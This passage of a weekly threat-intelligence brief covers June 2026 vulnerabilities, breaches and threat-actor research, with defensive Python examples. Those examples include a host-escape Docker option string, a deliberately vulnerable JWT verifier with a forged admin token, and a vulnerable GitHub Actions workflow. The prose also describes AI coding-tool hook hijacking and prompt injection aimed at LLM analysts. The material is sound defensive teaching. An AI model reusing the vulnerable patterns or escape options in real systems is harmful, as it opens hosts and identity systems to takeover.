### CVE-2026-43503 (DirtyClone) and CVE-2026-46331 (pedit COW) — Linux kernel LPE with public weaponised PoCs

Two page-cache-corruption local-privilege-escalation flaws drew working exploits within the window. JFrog [published a full DirtyClone walkthrough](https://research.jfrog.com/post/dissecting-and-exploiting-linux-lpe-variant-dirtyclone-cve-2026-43503/) (XFRM/IPsec skb cloning) on 06-25; a companion `tc act_pedit` out-of-bounds write (`pedit COW`) gained a [weaponised PoC](https://thehackernews.com/2026/06/new-linux-pedit-cow-exploit-enables.html) within a day of assignment. Both are post-auth root escalations on patched-but-unrebooted hosts — prioritise kernel updates on multi-tenant and internet-exposed Linux where an initial foothold is plausible.

— *Source: [JFrog Security Research](https://research.jfrog.com/post/dissecting-and-exploiting-linux-lpe-variant-dirtyclone-cve-2026-43503/) · [Red Hat RHSB-2026-008](https://access.redhat.com/security/vulnerabilities/RHSB-2026-008) · [The Hacker News — pedit COW](https://thehackernews.com/2026/06/new-linux-pedit-cow-exploit-enables.html) · [Daily brief 06-27](briefs/2026-06-27.md) · Tags: vulnerabilities, lpe, priv-esc, poc-public, patch-available · Region: global · CVE: CVE-2026-43503, CVE-2026-46331 · CVSS: 8.8 (CVE-2026-43503), n/a (CVE-2026-46331) · Vector: local · Auth: post-auth · Status: poc-public, patch-available*

### CVE-2026-58053 — Gitea `act_runner` Docker backend: container-hardening bypass to host escape (public PoC, ENISA-critical)

Gitea `act_runner` through 0.262.0 passes a workflow-defined `container.options` string straight into Docker's `HostConfig`, forcing only `Privileged=false` while merging `--pid=host`, `--cap-add` and `--security-opt` unchanged — a malicious workflow escapes the job container to the host ([VulnCheck](https://www.vulncheck.com/advisories/gitea-act-runner-container-hardening-bypass-via-workflow-container-options)). Public PoC, CVSS 9.4, mitigation-only this week. Self-hosted Gitea CI is common in DACH developer shops and universities; restrict who can define workflow container options. The companion Gitea-core auth bypass via `X-WEBAUTH-USER` (CVE-2026-20896, [fixed in 1.26.3/1.26.4](https://blog.gitea.com/release-of-1.26.3-and-1.26.4)) remains worth patching on the same estate.

— *Source: [VulnCheck advisory](https://www.vulncheck.com/advisories/gitea-act-runner-container-hardening-bypass-via-workflow-container-options) · [ENISA EUVD EUVD-2026-58053](https://euvd.enisa.europa.eu/enisa/eu_vulnerability_database/EUVD-2026-58053) · [Daily brief 06-28](briefs/2026-06-28.md) · Tags: vulnerabilities, poc-public, priv-esc, rce, enisa-critical · Region: global, europe, switzerland · Sector: public-sector, education, technology · CVE: CVE-2026-58053 · CVSS: 9.4 · Vector: user-interaction · Auth: post-auth · Status: poc-public, enisa-critical, mitigation-only*
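The failure mode above, forcing one field false while merging the rest of a caller-supplied option string unchanged, is a denylist problem, and the mitigation the brief asks for (restrict who can define workflow container options) is easier to enforce with an allowlist. The two validators below are an added example; they are not Gitea's or VulnCheck's code and use the standard Docker CLI flag names rather than act_runner's internal representation. The set of safe options is an assumption a runner operator would tune.

```python
"""Two validators for a workflow-supplied Docker options string, illustrating
the shape of CVE-2026-58053: forcing Privileged=false while merging everything
else unchanged, versus accepting only a reviewed set of options. Added example;
not Gitea's or VulnCheck's code. Flag names are the standard Docker CLI ones."""
import shlex

# The options the brief names as reaching HostConfig unchanged.
DANGEROUS_PREFIXES = ("--privileged", "--pid", "--cap-add", "--security-opt")

# Assumption: what a runner operator decides a workflow may set at all.
SAFE_OPTIONS = {"--env", "-e", "--label", "--memory", "--cpus", "--shm-size"}


def denylist_validate(options: str) -> dict:
    """Vulnerable shape: drop --privileged, pass every other token through."""
    kept = [tok for tok in shlex.split(options) if tok != "--privileged"]
    return {"privileged": False, "passthrough": kept}


def still_escapes(passthrough) -> list:
    """Report which host-reaching options survived the denylist. Prefix
    matching is only for this report; the real control is the allowlist."""
    return [t for t in passthrough if t.startswith(DANGEROUS_PREFIXES)]


def allowlist_validate(options: str) -> list:
    """Hardened shape: accept only SAFE_OPTIONS, in both '--opt=value' and
    '--opt value' forms, and reject anything else before it reaches Docker."""
    toks = shlex.split(options)
    accepted, i = [], 0
    while i < len(toks):
        name, sep, inline_val = toks[i].partition("=")
        if name not in SAFE_OPTIONS:
            raise ValueError(f"option not permitted in workflow container.options: {name}")
        if sep:
            accepted.append((name, inline_val))
            i += 1
        else:
            if i + 1 >= len(toks):
                raise ValueError(f"missing value for {name}")
            accepted.append((name, toks[i + 1]))
            i += 2
    return accepted


if __name__ == "__main__":
    # Constructed option string of the kind a malicious workflow would supply.
    sample = "--privileged --pid=host --cap-add SYS_ADMIN --security-opt seccomp=unconfined"
    result = denylist_validate(sample)
    print("denylist kept privileged =", result["privileged"],
          "but passed:", still_escapes(result["passthrough"]))
    try:
        allowlist_validate(sample)
    except ValueError as err:
        print("allowlist rejected:", err)
    print("allowlist accepted:", allowlist_validate("--env CI=1 --memory=2g"))
```

The point is the asymmetry: a denylist has to anticipate every spelling of every dangerous option (`--pid=host`, `--pid host`, and whatever the next Docker release adds), while an allowlist only has to know the handful of options a CI job legitimately needs.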

### CVE-2026-11800 (JWT algorithm-confusion) and CVE-2026-9800 (policy-enforcer authz bypass) — Keycloak identity-plane fixes

Keycloak 26.6.4 [fixed eight CVEs](https://www.keycloak.org/2026/06/keycloak-2664-released). The headline flaw is CVE-2026-11800, a JWT algorithm-confusion that lets an attacker with valid client credentials forge an assertion, bypass signature verification and impersonate any federated user behind the affected identity provider ([GHSA-gqj5-2xp5-3qmp](https://github.com/advisories/GHSA-gqj5-2xp5-3qmp), [BSI WID-SEC-2026-2093](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2093)); the bundled CVE-2026-9800 is a separate policy-enforcer authorization bypass via incorrect URI comparison. Keycloak is the IdP of choice across European public-sector, healthcare and finance deployments — these are identity-plane breaks, not app bugs. Patch to 26.6.4.

— *Source: [Keycloak Project release notes](https://www.keycloak.org/2026/06/keycloak-2664-released) · [GitHub Advisory GHSA-gqj5-2xp5-3qmp](https://github.com/advisories/GHSA-gqj5-2xp5-3qmp) · [BSI WID-SEC-2026-2093](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2093) · [Daily brief 06-28](briefs/2026-06-28.md) · Tags: vulnerabilities, auth-bypass, identity, patch-available · Region: europe, switzerland, global · Sector: public-sector, finance, healthcare, education · CVE: CVE-2026-11800, CVE-2026-9800 · CVSS: 8.1 / 8.1 · Vector: zero-click · Auth: post-auth · Status: patch-available*
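Algorithm confusion in JWT verification is a known class, and the check that closes it is small. The verifier pair below is an added example; it is not Keycloak's code and does not reproduce the specific CVE-2026-11800 code path, only the general pattern: a verifier that lets the token's own `alg` header choose the primitive and hands the same configured key bytes to whichever it names, beside one that pins the algorithm the issuer is configured for and rejects a disagreeing header before touching any key. The RSA here is textbook (no padding) over a tiny constructed key so the file runs on the standard library alone; it exists only to make the comparison runnable.

```python
"""Vulnerable and hardened JWT verifiers illustrating the algorithm-confusion
class. Added example, not Keycloak's code. RSA is textbook over a constructed
toy key (standard library only) and must not be used for anything real."""
import base64
import hashlib
import hmac
import json


def b64u(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64u_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


# Constructed toy RSA key: two small primes, so signatures are a few bytes.
P, Q, E = 1000003, 1000033, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))
# What an issuer would publish; a verifier stores this as its key material.
PUBLIC_KEY_PEM = f"-----BEGIN TOY PUBLIC KEY-----\nn={N} e={E}\n-----END TOY PUBLIC KEY-----"


def _digest_int(signing_input: bytes) -> int:
    return int.from_bytes(hashlib.sha256(signing_input).digest(), "big") % N


def rs256_sign(signing_input: bytes) -> bytes:
    return pow(_digest_int(signing_input), D, N).to_bytes((N.bit_length() + 7) // 8, "big")


def rs256_verify(signing_input: bytes, sig: bytes) -> bool:
    return pow(int.from_bytes(sig, "big"), E, N) == _digest_int(signing_input)


def hs256_sign(signing_input: bytes, secret: bytes) -> bytes:
    return hmac.new(secret, signing_input, hashlib.sha256).digest()


def encode(claims: dict, alg: str, key) -> str:
    """Mint a token; 'key' is ignored for RS256 (the toy private key is global)."""
    header = b64u(json.dumps({"alg": alg, "typ": "JWT"}).encode())
    body = b64u(json.dumps(claims).encode())
    signing_input = f"{header}.{body}".encode()
    sig = rs256_sign(signing_input) if alg == "RS256" else hs256_sign(signing_input, key)
    return f"{header}.{body}.{b64u(sig)}"


def verify_trusting_header(token: str, key_material: bytes):
    """Vulnerable shape: the token's header selects the algorithm, and the
    configured key bytes are handed to whichever primitive it names."""
    h, b, s = token.split(".")
    alg = json.loads(b64u_decode(h)).get("alg")
    signing_input = f"{h}.{b}".encode()
    sig = b64u_decode(s)
    if alg == "RS256":
        ok = rs256_verify(signing_input, sig)
    elif alg == "HS256":
        ok = hmac.compare_digest(sig, hs256_sign(signing_input, key_material))
    else:
        ok = False
    return json.loads(b64u_decode(b)) if ok else None


def verify_pinned(token: str, expected_alg: str, key_material: bytes):
    """Hardened shape: issuer configuration decides the algorithm; a token
    whose header disagrees is rejected before any key is used."""
    h, _b, _s = token.split(".")
    if json.loads(b64u_decode(h)).get("alg") != expected_alg:
        return None
    return verify_trusting_header(token, key_material)


if __name__ == "__main__":
    key = PUBLIC_KEY_PEM.encode()
    legit = encode({"sub": "alice"}, "RS256", None)
    confused = encode({"sub": "admin"}, "HS256", key)  # HMAC over public key bytes
    print("trusting header:", verify_trusting_header(legit, key), verify_trusting_header(confused, key))
    print("pinned RS256:   ", verify_pinned(legit, "RS256", key), verify_pinned(confused, "RS256", key))
```

In a real deployment the pin comes from the issuer's registration (the algorithm and key type the identity provider was configured with), never from anything inside the token; the same principle applies to `kid` and `jku` headers, which should select among pre-registered keys rather than drive key retrieval.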

### CVE-2026-55200 / CVE-2026-55199 — libssh2 heap out-of-bounds write with public PoC

The GitHub Security Advisory [GHSA-r8mh-x5qv-7gg2](https://github.com/advisories/GHSA-r8mh-x5qv-7gg2) describes a heap out-of-bounds write in libssh2's `ssh2_transport_read()` that fails to enforce an upper bound on the `packet_length` field (CVSS 9.2), with a companion pre-auth DoS (CVE-2026-55199) corroborated by [NCSC-NL NCSC-2026-0210](https://advisories.ncsc.nl/2026/ncsc-2026-0210.html); public PoC code was reported within the window (see [daily 06-28](briefs/2026-06-28.md)). An upstream fix has landed (the GHSA references the fix commit), but tagged-release availability still varies across the binding and appliance ecosystem — so the operational task is SBOM exposure tracking and chasing each embedding vendor's release, not a single library bump (see § 11 caveat). libssh2 is embedded in a long tail of management tooling, appliances and language bindings.

— *Source: [GitHub Advisory GHSA-r8mh-x5qv-7gg2](https://github.com/advisories/GHSA-r8mh-x5qv-7gg2) · [NCSC-NL NCSC-2026-0210](https://advisories.ncsc.nl/2026/ncsc-2026-0210.html) · [Daily brief 06-28](briefs/2026-06-28.md) · Tags: vulnerabilities, poc-public, rce, dos · Region: global · Sector: technology · CVE: CVE-2026-55200, CVE-2026-55199 · CVSS: 9.2 / 8.2 · Vector: user-interaction · Auth: pre-auth · Status: poc-public, patch-available*

## 4. Sector & victim patterns

### Public administration & government

The week's public-sector signal is heavily Swiss/European. NCSC-CH reported an [active Microsoft 365 "voicemail" phishing wave](https://www.ncsc.admin.ch/ncsc/en/home/aktuell/im-fokus/2026/wochenrueckblick_25.html) in Switzerland delivering infostealers and harvesting M365 credentials, with chain-phishing onward from compromised mailboxes. The [Swiss Federal Audit Office reported](https://www.swisscybersecurity.net/news/2026-06-19/neue-cyberaufsicht-kaempft-mit-anlaufschwierigkeiten) that the two-year-old split of federal cyber-governance leaves strategic oversight without a complete incident picture — a structural finding for any federated public administration. Further afield, Ukraine's postal operator Ukrposhta had [digital services disrupted](https://therecord.media/ukraine-state-postal-operator-reports-disruption) by an overnight attack, and Brazil's national Cell Broadcast alert platform was [hijacked to push fake emergency messages](https://thenextweb.com/news/brazil-civil-defense-alert-hack-misanthropy-cell-broadcast) to ~30M phones — a reminder that government alerting infrastructure is itself a target.

— *Source: [NCSC-CH Wochenrückblick Week 25](https://www.ncsc.admin.ch/ncsc/en/home/aktuell/im-fokus/2026/wochenrueckblick_25.html) · [SwissCybersecurity.net — EFK audit](https://www.swisscybersecurity.net/news/2026-06-19/neue-cyberaufsicht-kaempft-mit-anlaufschwierigkeiten) · [The Record — Ukrposhta](https://therecord.media/ukraine-state-postal-operator-reports-disruption) · Tags: phishing, hacktivism, data-breach · Region: switzerland, europe · Sector: public-sector*

### Healthcare

Third-party processors drove the week's healthcare exposure. [Xsolis](https://www.hipaajournal.com/xsolis-data-breach/), a healthcare-AI utilization-management vendor, disclosed a phishing-driven breach affecting 1,396,519 patients across seven US health systems — the data sat at the processor, not the hospitals. The UK's HCRG Care Group [began notifying patients](https://hipaapulse.com/uk-more-than-one-year-later-hcrg-is-first-notifying-patients-of-33ec763c) of a February 2025 Medusa ransomware attack — a 16-month notification lag. The Lantronix BRIDGE:BREAK flaw (§ 3) additionally exposes serial-attached medical devices.

— *Source: [HIPAA Journal — Xsolis](https://www.hipaajournal.com/xsolis-data-breach/) · [HIPAA Pulse — HCRG](https://hipaapulse.com/uk-more-than-one-year-later-hcrg-is-first-notifying-patients-of-33ec763c) · Tags: data-breach, ransomware, supply-chain · Region: us, uk, europe · Sector: healthcare*

### Education

Education was a structural victim class. The ShinyHunters Canvas/Instructure breach [hit 160 UK universities](https://www.computerweekly.com/news/366645159/Canvas-breach-hit-160-UK-unis-but-caused-limited-damage) per the UK CMC sector review (ransom paid, limited downstream damage). The unpatched ILIAS 11.0 SQL-injection ([CVE-2026-12789](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2016), PoC-public, no patch) directly exposes the DACH learning-management estate, and self-hosted Gitea CI (§ 3) is concentrated in universities. The common thread: education runs exposed CMS/LMS/forum and developer stacks with thin operational security.

— *Source: [Computer Weekly — Canvas](https://www.computerweekly.com/news/366645159/Canvas-breach-hit-160-UK-unis-but-caused-limited-damage) · [BSI WID-SEC-2026-2016 — ILIAS](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2016) · Tags: data-breach, vulnerabilities, sqli · Region: uk, dach, europe · Sector: education*

### Technology & SaaS supply chain — the week's busiest victim class

The dominant pattern of the week was the third party as entry vector: Klue/Icarus (Salesforce OAuth, ~24 firms), ShapedPlugin (WordPress build pipeline), the npm worm wave, 8x8's SEC-disclosed Salesforce theft, and the BadBlocker Chrome extension (§ 6). In nearly every case the victim organisation had no vulnerability of its own to patch — the compromise rode in through a trusted vendor, integration token, package or browser extension.

— *Source: [SecurityWeek — Klue victims](https://www.securityweek.com/more-klue-breach-victims-identified-as-hackers-get-hacked/) · [Wordfence — ShapedPlugin](https://www.wordfence.com/blog/2026/06/psa-supply-chain-compromise-targets-shapedplugin-backdoored-pro-plugins-distributed-via-official-channels/) · Tags: supply-chain, data-breach, identity · Region: global, europe · Sector: technology*

## 5. Incidents & disclosures recap

The week's disclosures cluster around two recurring root causes: third-party/SaaS exposure and social-engineering entry. Read as a defender's learning summary rather than a chronology.

### Social engineering and SSO abuse opened the highest-profile intrusions

Madison Square Garden was breached by [a single vishing call](https://www.404media.co/how-hackers-broke-into-madison-square-garden/) into its identity platform; the operators talked a low-level employee into authorising access. This is the same human-layer entry that has driven the year's most damaging extortion. The defensive lesson is process, not product: callback verification on help-desk identity changes, no MFA reset on an inbound call, and alerting on anomalous SSO grants from new devices.

— *Source: [404 Media](https://www.404media.co/how-hackers-broke-into-madison-square-garden/) · [Abnormal Security](https://abnormal.ai/blog/shinyhunters-sso-social-engineering-mfa-identity-compromise) · Tags: phishing, identity, data-breach, organized-crime · Region: us, global · Sector: media, technology*

### Mass third-party exposures: Xsolis, Texas Parks & Wildlife, Canvas

Three large data exposures all traced to a third party rather than the named organisation: [Xsolis](https://www.hipaajournal.com/xsolis-data-breach/) (1.4M patients via a healthcare-AI processor), [Texas Parks & Wildlife](https://www.bleepingcomputer.com/news/security/texas-govt-data-breach-exposes-over-3-million-drivers-licenses/) (3.08M licence holders via an unnamed licence-sales vendor, with a public-vs-AG-filing SSN contradiction noted in § 11), and the Canvas/Instructure LMS breach (160 UK universities). The recurring control gap is vendor data-minimisation and breach-notification SLAs.

— *Source: [HIPAA Journal — Xsolis](https://www.hipaajournal.com/xsolis-data-breach/) · [BleepingComputer — Texas](https://www.bleepingcomputer.com/news/security/texas-govt-data-breach-exposes-over-3-million-drivers-licenses/) · Tags: data-breach, supply-chain · Region: us, uk · Sector: public-sector, healthcare, education*

### Attribution and accountability: Jaguar Land Rover and Scattered Spider

Two disclosures closed loops opened months ago. A [New York Times investigation](https://techcrunch.com/2026/06/26/russian-hackers-were-behind-2-5-billion-hack-of-jaguar-land-rover-report/) gave the first named attribution for the 2025 Jaguar Land Rover ransomware attack — a Russian state-linked criminal group — though investigators have not determined whether the operators worked for, independently of, or with the tacit approval of the Russian government. And two Scattered Spider members [pleaded guilty](https://www.nationalcrimeagency.gov.uk/news/cyber-criminals-who-hacked-into-transport-for-londons-computer-network-are-convicted) over the 2024 Transport for London intrusion. Both reinforce that the dominant English-speaking extortion ecosystems are being mapped to named individuals and state-linked clusters.

— *Source: [TechCrunch — JLR/NYT](https://techcrunch.com/2026/06/26/russian-hackers-were-behind-2-5-billion-hack-of-jaguar-land-rover-report/) · [UK National Crime Agency — TfL](https://www.nationalcrimeagency.gov.uk/news/cyber-criminals-who-hacked-into-transport-for-londons-computer-network-are-convicted) · Tags: ransomware, organized-crime, law-enforcement, russia-nexus · Region: uk, europe · Sector: manufacturing, transport*

## 6. Research & threat-actor developments

### Research: the trust chain, not the perimeter, was the week's attack surface

The week's research converges on one structural shift: the productive attack surface in 2026 is the set of trust relationships connecting developer tools, CI/CD pipelines, SaaS integrations, AI coding agents and the browser — not the network perimeter. Tenable's analysis of the Miasma worm frames it as a [**"Developer Credential Economy"**](https://www.tenable.com/blog/what-the-miasma-campaign-reveals-about-the-new-supply-chain-threat-model-and-the-underground): an infostealer harvests a developer credential (a Red Hat GitHub token sat in infostealer logs ~7 weeks before weaponisation), it is brokered underground, then weaponised through npm and — the novel capability — injected into the `SessionStart` hooks of AI coding tools so it runs when a developer opens a repo (Socket enumerates at least five affected tools — Claude Code, GitHub Copilot, Gemini CLI, Cursor, VS Code). The entire kill chain carries no CVE, and SLSA provenance attestations passed registry checks — provenance without content scanning is no defence ([Socket](https://socket.dev/blog/miasma-mini-shai-hulud-hits-leoplatform-npm-packages-go-ecosystem)).

The same trust-boundary theme runs through the week's other primary research: the Klue/Icarus cascade (a 2022 OAuth grant, § 2); Cordyceps, which found 300+ exploitable `pull_request_target` GitHub Actions misconfigurations leaking main-branch secrets ([Novee Security](https://novee.security/blog/cordyceps/)); Unit 42's malicious-skill payloads bypassing the OpenClaw agent sandbox ([Unit 42](https://unit42.paloaltonetworks.com/openclaw-ai-supply-chain-risk/)); and Island's "BadBlocker", an 11M-install Chrome ad-blocker one server-side config change away from arbitrary JavaScript on any site, with no extension update or store review ([Island](https://www.island.io/blog/badblocker-11-million-users-one-server-call-away-from-compromise)). On the identity plane, Netcraft documented Bluekit, a Browser-in-the-Middle phishing-as-a-service platform that authenticates the victim into the *attacker's* browser session, defeating Device Bound Session Credentials ([Netcraft](https://www.netcraft.com/blog/bluekit-phishing-as-a-service-threat)) — a reminder that session-binding controls like DBSC do not stop a browser-in-the-middle relaying the live authenticated session. Cisco Talos's [field guide to Windows COM abuse](https://blog.talosintelligence.com/introduction-to-com-usage-by-windows-threats/) (ITaskService, BITS, WMI, DCOM as EDR-evasion primitives) closes the loop on detection: indirect vtable calls hide activity behind legitimate service call stacks. The defender takeaway is uniform — audit OAuth grants and integration service accounts older than 12 months, restrict AI-agent hook configuration to read-only paths, treat CI/CD token scope as a reviewed principal, and don't assume FIDO2 closes the phishing path.

— *Source: [Tenable — Developer Credential Economy](https://www.tenable.com/blog/what-the-miasma-campaign-reveals-about-the-new-supply-chain-threat-model-and-the-underground) · [Netcraft — Bluekit BitM](https://www.netcraft.com/blog/bluekit-phishing-as-a-service-threat) · [Island — BadBlocker](https://www.island.io/blog/badblocker-11-million-users-one-server-call-away-from-compromise) · [Daily brief 06-28](briefs/2026-06-28.md) · Tags: supply-chain, identity, ai-abuse, cloud · Region: global, europe · Sector: technology, public-sector*
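
As an added illustration of the `pull_request_target` misconfiguration Cordyceps describes (example code written for this summary, not Novee Security's scanner), the stdlib-only Python auditor below scans workflow text for the three-step pattern: the privileged trigger, a checkout of the fork-controlled PR head, and a `run:` step that executes the checked-out tree with the base repository's secrets in scope. The sample workflows are constructed; the line-based scan handles typical hand-written workflows with single-line `run` steps and is a triage aid, not a YAML parser.

```python
"""Stdlib-only auditor for the pull_request_target + untrusted-checkout
pattern in GitHub Actions workflows.  Line-based scan, not a YAML parser:
good enough for typical hand-written workflows with single-line run steps."""
from __future__ import annotations
import re
from dataclasses import dataclass

# Ways a workflow checks out the fork-controlled PR head: an explicit head
# sha/ref, or a refs/pull/<n>/head|merge style ref.
HEAD_REF_RE = re.compile(
    r"github\.event\.pull_request\.head\.(?:sha|ref)"
    r"|refs/pull/\$\{\{[^}]*\}\}/(?:head|merge)"
)
RUN_RE = re.compile(r"^\s*-?\s*run\s*:\s*(.+)$", re.M)
# Commands that execute code from the checked-out tree inside the job.
EXEC_RE = re.compile(r"\b(?:npm\s+(?:ci|install|run)|yarn|pnpm\s+install|pip\s+install|make)\b")

@dataclass(frozen=True)
class Finding:
    severity: str   # info | high | critical
    message: str

def _on_block(text: str) -> str:
    """Return the top-level `on:` key and its indented children (the triggers)."""
    out, inside = [], False
    for line in text.splitlines():
        if re.match(r"^on\s*:", line):
            inside = True
        elif inside and line.strip() and not line[0].isspace():
            break                      # next top-level key ends the block
        if inside:
            out.append(line)
    return "\n".join(out)

def audit_workflow(text: str) -> list[Finding]:
    findings: list[Finding] = []
    if not re.search(r"\bpull_request_target\b", _on_block(text)):
        return findings                # push / pull_request: fork code never sees secrets
    findings.append(Finding("info", "pull_request_target: job runs in the base-repo "
                                    "context with a write-capable token and secrets"))
    if not HEAD_REF_RE.search(text):
        return findings                # e.g. a labeler that never touches PR code
    findings.append(Finding("high", "fork-controlled PR head is checked out into the privileged job"))
    executed = [m.group(1) for m in RUN_RE.finditer(text) if EXEC_RE.search(m.group(1))]
    if executed:
        findings.append(Finding("critical", "checked-out PR code is executed ("
                                + "; ".join(executed) + "); every secret in the job "
                                "environment is readable by the fork author"))
    return findings

def worst_severity(text: str) -> str:
    rank = {"none": 0, "info": 1, "high": 2, "critical": 3}
    return max((f.severity for f in audit_workflow(text)), key=rank.__getitem__, default="none")

# Constructed sample workflows (not taken from any real repository).
VULNERABLE_WORKFLOW = """\
name: PR CI
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: npm ci && npm test
        env:
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
"""
LABELER_WORKFLOW = """\
name: Label PRs
on: [pull_request_target]
jobs:
  label:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/labeler@v5
"""
# Same job under the unprivileged trigger: fork code runs without secrets.
PLAIN_PR_WORKFLOW = VULNERABLE_WORKFLOW.replace("pull_request_target:", "pull_request:")

if __name__ == "__main__":
    for name, wf in [("vulnerable", VULNERABLE_WORKFLOW), ("labeler", LABELER_WORKFLOW),
                     ("plain", PLAIN_PR_WORKFLOW)]:
        print(name, worst_severity(wf), [f.message for f in audit_workflow(wf)])
```

The severity ladder mirrors the argument in the research: `pull_request_target` alone is only noteworthy, checking out the PR head is the real exposure, and executing that checkout (an `npm ci`, a `make`) is what turns a misconfiguration into a secret leak.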

### Threat-actor developments: Russia-nexus espionage broadens; new China-nexus and DPRK clusters

The most significant new actor finding the dailies did not carry is Turla's **STOCKSTAY** — Google GTIG [characterised](https://cloud.google.com/blog/topics/threat-intelligence/stockstay-turla-intelligence-gathering) a multi-component .NET/Windows Forms backdoor that communicates C2 over secure WebSocket and shares significant code overlap with Kazuar (Turla's staple implant since 2017). Delivery used malicious RDP files sent by phishing and, as recently as November 2025, RAR archives exploiting WinRAR's CVE-2025-8088 (a flaw also abused by Sandworm, Gamaredon and RomCom). Current targeting is Ukrainian government and military, but earlier victims had Italian, Dutch, Polish and German foreign-policy interest — a direct read-across for Swiss federal and European governmental entities with Ukraine-adjacent policy work ([The Hacker News](https://thehackernews.com/2026/06/google-details-turlas-new-stockstay.html)). This sits alongside the week's other Russia-nexus signal: FBI/CISA escalated their warning that Russian intelligence (tracked as UNC5792) is now [phishing Signal Backup Recovery Keys](https://www.ic3.gov/PSA/2026/PSA260626) for persistent account takeover, and ESET's Gamaredon retrospective (§ 7) shows the FSB-linked group moving exfil and C2 wholesale onto trusted cloud services.

Two non-Russian clusters round out the picture. Unit 42 documented **CL-STA-1062**, a Chinese-speaking cluster (overlapping Talos's UAT-7237) deploying the new TinyRCT .NET backdoor via AppDomainManager injection against Southeast-Asian government and state-owned energy targets ([Unit 42](https://unit42.paloaltonetworks.com/cl-sta-1062-tinyrct-backdoor/)); Kaspersky GReAT analysed the **StrikeShark** cluster's SharkLoader deploying Cobalt Strike via "Perfect DLL Hijacking" against government targets ([Securelist](https://securelist.com/strikeshark-campaign/120326/)). And SentinelLABS' **macOS.Gaslight**, a DPRK-aligned Rust backdoor, notably turns prompt injection on the LLM-assisted analyst rather than the sandbox ([SentinelLABS](https://www.sentinelone.com/labs/macos-gaslight-rust-backdoor-turns-prompt-injection-on-the-analyst-not-the-sandbox/)) — an early instance of tradecraft built specifically to poison AI-assisted triage. Attribute the claim to the research outfit, not the state, where the source itself hedges.

— *Source: [Google GTIG — STOCKSTAY](https://cloud.google.com/blog/topics/threat-intelligence/stockstay-turla-intelligence-gathering) · [FBI IC3 PSA I-062626-PSA](https://www.ic3.gov/PSA/2026/PSA260626) · [Unit 42 — CL-STA-1062](https://unit42.paloaltonetworks.com/cl-sta-1062-tinyrct-backdoor/) · [Daily brief 06-27](briefs/2026-06-27.md) · Tags: nation-state, espionage, russia-nexus, china-nexus, north-korea-nexus · Region: europe, switzerland, apac, global · Sector: public-sector, defense*

## 7. Annual / periodic threat reports

### Swiss Post Cybersecurity — inaugural Swiss Threat Landscape Report `[SINGLE-SOURCE]`

Swiss Post Cybersecurity [published its first Swiss Threat Landscape Report](https://www.swisspost-cybersecurity.ch/news/swiss-threat-landscape-report) at its Hack'Events conference (06-23), drawing on its own SOC, IR and offensive-security practice. For a Swiss public-sector SOC this is the most locally-grounded threat baseline of the week; the synthesis worth carrying beyond the daily's recap is that the report's emphasis on phishing, identity compromise and AI-abuse maps precisely onto the week's operational signal — the NCSC-CH M365 voicemail-phishing wave (§ 4), the Bluekit BitM and Klue OAuth identity attacks (§§ 2, 6), and AI-agent supply-chain abuse (§ 6). The local-vendor view and the week's incidents agree on where Swiss defenders should spend marginal effort: identity and the human layer, not perimeter CVEs alone.

— *Source: [Swiss Post Cybersecurity](https://www.swisspost-cybersecurity.ch/news/swiss-threat-landscape-report) · [Daily brief 06-24](briefs/2026-06-24.md) · Tags: phishing, identity, ai-abuse · Region: switzerland · Sector: public-sector, finance*

### ESET "Killing me gently" — a de-facto mid-year RaaS-tooling report

**Background.** The Gentlemen emerged in late 2025 as a RaaS operation founded by "hastalamuerte" (a former Qilin affiliate per Group-IB, previously affiliated with Embargo, LockBit, Medusa and BlackLock per PRODAFT). ESET first hypothesised an in-house EDR-killer in February 2026; Group-IB and Check Point independently corroborated before the gang's own internal data leaked. By April 2026 the group accounted for ~10% of global ransomware activity, and Krebs (06-10) linked the alias to a named individual in Izhevsk, Russia.

ESET's 06-26 deep-dive into the leaked internal data is the most substantive published-in-window documentation of RaaS tooling structure, and reads as a mid-year complement to the W25 Check Point State of Ransomware Q1 2026. Three structural findings a detection engineer should register: (1) GentleKiller is a modular in-house framework with at least eight BYOVD variants, each impersonating a different vendor and abusing a different kernel driver — driver allow-listing alone is insufficient without process-injection-chain detection; (2) the group integrates *rival gangs'* EDR killers (HexKiller from Warlock, ThrottleBlood shared with MedusaLocker/DragonForce, HavocKiller), so tooling overlap no longer implies operational overlap; (3) victims are selected centrally on FortiGate misconfiguration rather than geography, tying the Gentlemen victim pipeline directly to FortiBleed-style reconnaissance (§ 8). New BYOVD PoCs are operationalised within days of public release. ([daily 06-27](briefs/2026-06-27.md))

— *Source: [ESET WeLiveSecurity](https://www.welivesecurity.com/en/eset-research/killing-me-gently-inside-gentlemens-edr-killer-framework/) · [ESET Newsroom](https://www.eset.com/us/about/newsroom/research/eset-research-gentlemen-ransomware-gang-edr-killers/) · [Daily brief 06-27](briefs/2026-06-27.md) · Tags: ransomware, organized-crime, russia-nexus · Region: global, europe, switzerland · Sector: manufacturing, healthcare, energy*

### ESET Gamaredon 2025 — annual actor retrospective

**Background.** Gamaredon (FSB-linked, Russia-nexus) has been ESET's most-tracked Ukraine-focused operator for years; its prior annual papers documented a high-tempo, PowerShell-heavy toolset and aggressive infrastructure churn.

ESET's [2025 Gamaredon paper](https://www.welivesecurity.com/en/eset-research/gamaredon-2025-leveraging-tunnels-workers-dead-drops-new-alliances/) (covered 06-26) documents six new PowerShell tools and the wholesale migration of exfiltration and C2 onto trusted cloud services, tunnels and "workers" — the horizon implication for European public-sector defenders is detection-oriented: Gamaredon-class C2 increasingly hides inside legitimate cloud-service traffic (Cloudflare workers, Telegram, dead-drop resolvers), so network-indicator blocking degrades and behavioural detection on the endpoint and on anomalous cloud-service egress becomes the durable control.

